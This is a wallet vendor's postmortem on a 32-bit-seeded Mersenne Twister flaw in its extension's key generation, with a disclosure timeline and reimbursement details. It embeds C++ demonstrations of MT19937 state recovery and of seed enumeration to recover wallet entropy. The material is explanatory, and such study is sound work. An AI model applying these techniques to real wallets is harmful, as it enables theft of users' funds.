This postmortem provides an in-depth account of the vulnerability and the steps we took to protect our users’ wallets. For a summary of the incident and an FAQ, please refer to our disclosure statement.
The Vulnerability
In November 2022, a vulnerability was discovered in the WebAssembly (WASM) back-end module of the open source repository wallet core. It affected new wallets generated by versions 0.0.172 through 0.0.182 of the Browser Extension. Only the private keys of the limited number of new wallets created in these versions are affected. The vulnerability was fixed on November 22, 2022, so all other Browser Extension versions, including the current version, are safe to use. Imported wallets and mobile wallets are not affected by this issue.
The affected WASM build used MT19937, the Mersenne Twister pseudo-random number generator (PRNG) with a 19937-bit state, to produce the entropy behind new mnemonics. The generator was seeded with a single 32-bit value, so every mnemonic it produced was a deterministic function of that seed: at most 2^32 (approximately 4.3 billion) distinct mnemonics were possible, a space small enough to enumerate offline. Additionally, because MT19937 is built on a linear recurrence, its output is not suitable for cryptographic purposes at all: 624 consecutive 32-bit outputs are enough to reconstruct its internal state and predict every subsequent output.
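The state-recovery property just described, shown in working code. This is an added example written for this postmortem's topic, not code from wallet core or from the researcher's report: it captures 624 consecutive outputs of a std::mt19937 whose seed the "attacker" never sees, inverts the output tempering to rebuild the 624-word state, runs the generator's own recurrence forward, and checks that the predictions match the real generator. The names temper, untemper, RecoveredMT, predictNext and predictionMatches are this example's own.

```cpp
// Added example, not wallet-core code: reconstruct MT19937's internal state
// from 624 consecutive outputs and predict the outputs that follow.
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <random>
#include <vector>

constexpr std::size_t kMtN = 624;  // state words (624 * 32 bits, 19937 of them used)
constexpr std::size_t kMtM = 397;  // recurrence offset

// Output tempering as MT19937 applies it to each state word before emitting it.
uint32_t temper(uint32_t y) {
    y ^= y >> 11;
    y ^= (y << 7) & 0x9d2c5680u;
    y ^= (y << 15) & 0xefc60000u;
    y ^= y >> 18;
    return y;
}

// Inverse of temper(). Each step xors a value with a shifted copy of itself,
// so it is undone by re-applying the shift until every bit is recovered.
uint32_t untemper(uint32_t y) {
    y ^= y >> 18;                     // top 14 bits were untouched: one pass
    y ^= (y << 15) & 0xefc60000u;     // mask only consumes untouched bits: one pass
    uint32_t t = y;
    for (int i = 0; i < 5; ++i)       // recovers 7 more low bits per pass
        t = y ^ ((t << 7) & 0x9d2c5680u);
    y = t;
    t = y;
    for (int i = 0; i < 3; ++i)       // recovers 11 more high bits per pass
        t = y ^ (t >> 11);
    return t;
}

// The generator's own state transition, run on a state we rebuilt rather
// than one we seeded. Matches std::mt19937 word for word.
struct RecoveredMT {
    std::array<uint32_t, kMtN> mt{};
    std::size_t index = kMtN;

    void twist() {
        for (std::size_t i = 0; i < kMtN; ++i) {
            uint32_t y = (mt[i] & 0x80000000u) | (mt[(i + 1) % kMtN] & 0x7fffffffu);
            mt[i] = mt[(i + kMtM) % kMtN] ^ (y >> 1) ^ ((y & 1u) ? 0x9908b0dfu : 0u);
        }
        index = 0;
    }
    uint32_t next() {
        if (index >= kMtN) twist();
        return temper(mt[index++]);
    }
};

// From at least 624 consecutive observed outputs, predict the next `count`.
// Returns an empty vector when too little output was observed.
std::vector<uint32_t> predictNext(const std::vector<uint32_t>& observed, std::size_t count) {
    std::vector<uint32_t> out;
    if (observed.size() < kMtN) return out;
    RecoveredMT r;
    const std::size_t start = observed.size() - kMtN;   // use the latest 624 outputs
    for (std::size_t i = 0; i < kMtN; ++i) r.mt[i] = untemper(observed[start + i]);
    for (std::size_t i = 0; i < count; ++i) out.push_back(r.next());
    return out;
}

// Seed a real std::mt19937 with a value the "attacker" never sees, hand over
// 624 outputs, and check the next `count` predictions against the generator.
bool predictionMatches(uint32_t hiddenSeed, std::size_t count) {
    std::mt19937 victim(hiddenSeed);
    std::vector<uint32_t> seen;
    for (std::size_t i = 0; i < kMtN; ++i) seen.push_back(victim());
    std::vector<uint32_t> guess = predictNext(seen, count);
    if (guess.size() != count) return false;
    for (uint32_t g : guess)
        if (g != victim()) return false;
    return true;
}

int main() {
    std::printf("prediction from 624 outputs correct: %s\n",
                predictionMatches(0xc0ffeeu, 1000) ? "yes" : "no");
    return 0;
}
```

Nothing about the seed is needed: the 624 observed words are the complete state, which is why a generator of this family must never be used for key material, whatever it was seeded with.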
Please note that this issue has not yet been registered as a Common Vulnerabilities and Exposures (CVE) entry. However, another team discovered a similar issue in the Intel Paillier Cryptosystem Library, which can be found here: Insecure PRNG in key generation · Issue #2 · intel/pailliercryptolib · GitHub.
The core problem is that MT19937 provides nowhere near the randomness a private key requires. When this generator was used to create private keys, a skilled individual (potentially a bad actor) who observed enough of its output could predict all of its future output. More practically, because the seed is only 32 bits, a malicious actor does not need to observe anything: they could enumerate all 2^32 possible seeds, derive the mnemonic, private keys and addresses for each, and build a database keyed by address. Any address created with the vulnerable versions can then be looked up in that database to recover its private key, across every chain the wallet supports. If an attacker knows that a specific wallet address was created with the vulnerable generator, recovering its private key from the public address requires only medium to high computational power.
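The seed-enumeration attack described above, as an added example rather than wallet core's actual code. It assumes the vulnerable pattern was 128 bits of mnemonic entropy drawn from a std::mt19937 seeded with one 32-bit value; it stands in for the on-chain address with a 64-bit FNV-1a hash of that entropy (a real attacker would derive the BIP39 seed, BIP32 keys and addresses instead, and the search loop would be the same); it searches only a 65,536-seed window so the demonstration runs in a moment; and it takes the hardened replacement's bytes from /dev/urandom. The function names weakEntropy, fingerprint, recoverSeed and secureEntropy are this example's own.

```cpp
// Added example, not wallet-core code: the shape of the flaw, the attack it
// invites, and the replacement. All assumptions are noted in the comments.
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <fstream>
#include <optional>
#include <random>

using Entropy = std::array<uint8_t, 16>;  // 128 bits = a 12-word BIP39 mnemonic

// Vulnerable pattern (assumed shape): every byte is a deterministic function
// of one 32-bit seed, so at most 2^32 distinct mnemonics can ever be produced.
Entropy weakEntropy(uint32_t seed) {
    std::mt19937 gen(seed);
    Entropy e{};
    for (std::size_t i = 0; i < e.size(); i += 4) {
        uint32_t w = gen();
        e[i] = static_cast<uint8_t>(w);
        e[i + 1] = static_cast<uint8_t>(w >> 8);
        e[i + 2] = static_cast<uint8_t>(w >> 16);
        e[i + 3] = static_cast<uint8_t>(w >> 24);
    }
    return e;
}

// Stand-in for the public address (an assumption of this example): 64-bit
// FNV-1a over the entropy. A real attacker derives mnemonic -> BIP39 seed ->
// BIP32 keys -> on-chain addresses instead; the matching logic is identical.
uint64_t fingerprint(const Entropy& e) {
    uint64_t h = 0xcbf29ce484222325ULL;
    for (uint8_t b : e) {
        h ^= b;
        h *= 0x100000001b3ULL;
    }
    return h;
}

// Offline enumeration: try every seed in [lo, hi) and stop at the first whose
// derived fingerprint matches. The real search space is all 2^32 seeds; the
// window only keeps this demonstration quick.
std::optional<uint32_t> recoverSeed(uint64_t target, uint64_t lo, uint64_t hi) {
    for (uint64_t s = lo; s < hi && s <= 0xffffffffULL; ++s) {
        if (fingerprint(weakEntropy(static_cast<uint32_t>(s))) == target)
            return static_cast<uint32_t>(s);
    }
    return std::nullopt;
}

// Hardened replacement: every bit comes from the operating system's CSPRNG.
// /dev/urandom is assumed here; a WASM build would use the host's secure
// random source (in a browser, crypto.getRandomValues) the same way.
std::optional<Entropy> secureEntropy() {
    std::ifstream urandom("/dev/urandom", std::ios::binary);
    Entropy e{};
    if (!urandom.read(reinterpret_cast<char*>(e.data()), e.size())) return std::nullopt;
    return e;
}

int main() {
    const uint32_t victimSeed = 0x2a3b4c5du;              // what the vulnerable wallet used
    uint64_t fp = fingerprint(weakEntropy(victimSeed));   // what the attacker sees on-chain
    auto found = recoverSeed(fp, 0x2a3b0000ULL, 0x2a3c0000ULL);
    if (found) std::printf("recovered seed %08x -> key material known\n", *found);
    auto fresh = secureEntropy();
    if (fresh) std::printf("secure entropy, first byte %02x\n", (*fresh)[0]);
    return 0;
}
```

The demonstration window contains the victim seed; the full 2^32 space is a bounded offline job, which is why a precomputed address-to-key database is the realistic threat and why nothing short of regenerating the wallet from proper entropy removes it.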
During our impact analysis, we identified a few other wallet addresses (fewer than 100) that had been created with the same MT19937 issue. Some of these wallets were created several years ago, and most of them were not in active use.
Trust Wallet’s Response to the Vulnerability
The code that caused the vulnerability was fixed within 1 day of verifying the bug bounty report. This ensured that wallet addresses created after the fix were not susceptible to the vulnerability. However, wallets created with versions 0.0.172 through 0.0.182 remained vulnerable: their keys had already been generated from a 32-bit seed, and no software update could change that. The Trust Wallet development team could not eliminate the vulnerability for those wallets without the involvement of their owners. To be free from the vulnerability, users must migrate their assets from the affected wallet addresses to new, non-affected wallet addresses, and for clarity, this action must be performed by the wallet owners themselves. Under these circumstances, we undertook every possible measure to inform users and assist them in mitigating the risk of potential attacks.
The Trust Wallet team has been working hard to keep our users’ assets on the affected wallet addresses safe. To reach as many affected users as possible, we have used every available means to notify them and encourage them to transfer their assets out of the affected wallet addresses, using a multi-channel notification strategy that includes one-to-one in-app warnings repeated every minute and mobile push notifications.
Affected users would have seen a warning message in their Browser Extension with clear instructions on how to transfer their assets into a non-custodial wallet or a centralized exchange. In addition, to assure users that the warning banner was not a scam, we published a Trust Wallet security overview blog post on December 7, 2022, in which the “Extension warning banner” was shown as the official and legitimate warning message from Trust Wallet.
Additionally, when public on-chain data showed that the affected wallet addresses had been funded from Binance, we contacted Binance to help notify the users while maintaining their privacy. We take the protection of our users’ privacy seriously: no personally identifiable information has ever been shared between Binance and Trust Wallet, and we appreciate that Binance’s customer support team helped reach the affected users that they could reach.
We deliberated whether to disclose the vulnerability as soon as all feasible fixes were in place. After thorough evaluation, however, we determined that an early public disclosure would have exposed the majority of affected users’ funds to an immediate, near-certain risk of theft. Our primary objective was to help users preserve as much of their assets as possible and prevent potential losses. We believed that confidential, one-on-one communication would enable users to take the necessary actions without giving up sole control of their assets.
We also assisted affected users with customer support and reimbursed their gas fees. As of today, we have reimbursed a total of ~23.6 BNB in gas fees to users who transferred their assets to a secure location.
With our extensive notification efforts in the last five months, the majority of the assets in the affected wallet addresses have been moved to safe locations by the users.
While disclosing this information still carries some risk, the majority of funds have been transferred and secured by users over the past few months. Consequently, the operational cost for a bad actor to exploit the vulnerability has risen relative to the potential gain from the remaining affected wallets: they currently hold approximately $88,300 USD across ~500 affected wallets with a balance above $10 USD worth of tokens. Additionally, the vulnerable code has been identified and patched.
The Reimbursement Process
Despite our best efforts, two exploits occurred, resulting in a total loss of approximately $170,000 USD at the time of the attacks.
We will continue to support our users and encourage any remaining affected users to take the steps to secure their wallets and/or claim their reimbursement.
We know the exact list of affected wallets. Please check your Browser Extension to see whether you have received a notification, and read the reimbursement process carefully to see whether you are eligible to claim a reimbursement as a victim.
If you haven’t received a notification in your Trust Wallet browser extension, your wallet address was not affected by the vulnerability at all and is safe to use.
Timeline
November 2022
- On November 17, a security researcher identified and reported a vulnerability to us via the Trust Wallet bug bounty program.
- The vulnerability was verified and confirmed to be critical for the team to take immediate actions.
- Within 1 day of verifying the vulnerability, we applied a patch to the WASM back-end module in the open-source repository wallet core to fix the issue.
- Within 2 days, Browser Extension v0.0.183 was released. New wallets created with this version or later are no longer vulnerable. Users on the affected versions were automatically updated to the new, secure version.
- Browser Extension v0.0.187 was released, adding a warning banner for impacted wallet owners. The warning described the risk to their existing wallet addresses and urged them to move their assets to other, secure wallet addresses, following a step-by-step guide.
- In addition to the in-app warning for affected users, the Trust Wallet security scanner started warning users not to transfer assets into the affected wallets, to avoid increasing their risk exposure.
- We delivered multiple push notifications to Trust Wallet mobile applications identified as associated with the affected wallet addresses.
- We provided gas fee reimbursements for users who moved their assets because of the incident, and continue to do so.
- We prepared a public disclosure statement. However, we considered that once the disclosure was made, a bad actor could exploit the remaining wallets and take the funds left in them. We therefore gave affected users more time to secure their funds instead of making a premature disclosure.
December 2022
- Browser Extension v0.0.200 went live, adding a warning icon badge to the affected wallets.
- Sent another round of mobile push notifications.
- Published Trust Wallet security overview blog post to help our users understand that the in-app warning banner is not a scam.
- 1st exploit observed. Received customer service tickets from the affected users and started the reimbursement process.
February 2023
- Reassessed the disclosure timeline. Decided to give more time for the affected wallet users to secure the funds.
March 2023
- Bug Bounty was paid out to the security researcher.
- 2nd exploit observed. Received customer service tickets from the victims of the exploit and started the reimbursement process.
- Met with the Ledger team to analyze the industry precedents to handle similar situations.
April 2023
- The majority of assets on the vulnerable wallet addresses have already been secured by the wallet owners.
- Displayed an updated warning message on the affected wallets, providing additional information about the reimbursement guide.
- The vulnerability disclosure and postmortem were published.
Moving Forward
We want to assure our users that we are taking this matter seriously and are actively working to recover the assets stolen in the exploits. Our team is collaborating with security experts to conduct a thorough investigation to identify the culprits and hold them accountable. To further incentivize anyone with information on the matter, we are offering a bounty for information that directly leads to the identification of the responsible parties.
Providing a secure wallet for our users to safeguard their funds is a top priority at Trust Wallet. We have made significant investments in improving our security measures to better protect our users and their funds. Let’s look at some of the things we do to keep our users secure.
Security audits
We have increased our security audits and audit coverage fivefold over the last few months. These include code review, design review, and penetration testing. These increased efforts help us identify vulnerabilities before they are exploited and prevent future incidents.
Internal security review
Our internal security team performs regular security reviews, covering both application and infrastructure security. This ongoing process ensures that we maintain a high level of security and are always improving our security posture.
External auditors
We have engaged multiple top-tier, third-party external auditors to assess our application security. This due diligence ensures that we have an independent assessment of our security protocols and measures and identifies any improvement opportunities that we may need to address. You can read the latest security audit reports here.
Internal security training
We run company-wide security training for employees to heighten security awareness and improve security practices.
User security
Not directly due to this incident, but we have always been making progress on features that help users keep themselves from harm.
The Trust Wallet Browser Extension integrated with Ledger hardware wallets in January 2023. Keeping private keys on a hardware device adds another layer of security.
Our Security Scanner feature warns users whenever they interact with a known risky address or the smart contract of a malicious dApp, helping them make informed decisions about their transactions.
By implementing these measures, we are confident that we are taking the necessary steps to enhance our security, protect users’ wallets and prevent similar incidents from occurring in the future.
We will continue to work with the community to proactively identify and resolve any vulnerabilities and are constantly looking for ways to improve our processes to ensure that we are identifying and mitigating security risks as early as possible.
We would like to sincerely thank the community for the support to make Trust Wallet a safe platform. We’re deeply sorry this incident occurred and apologise for any distress it may have caused our users. Fortunately, none of our users will be negatively impacted. Please continue to let us know how we can better improve security, reduce risk, and improve our support so that we can continue to earn your trust.
Special Thanks
We would like to express our sincere appreciation to the security researcher Jean-Baptiste Bédrune, who discovered and reported the vulnerability to us. His contribution has been invaluable in helping us ensure the security of users’ wallets. As a token of our gratitude, we have already awarded the security researcher with the highest level of our bounty reward.
We would like to thank the Ledger security team, especially their CTO Charles Guillemet, for working diligently with us to provide feedback and suggestions on how to approach this situation to produce the best outcome for our users and the community.
Finally, we would also like to extend our gratitude to the Binance security team for their exceptional handling of the bug bounty process. Their expertise in triaging the issue, conducting risk assessments, escalating the matter, conducting impact analysis, and communicating with the security researcher was vital in minimizing the overall impact of the vulnerability.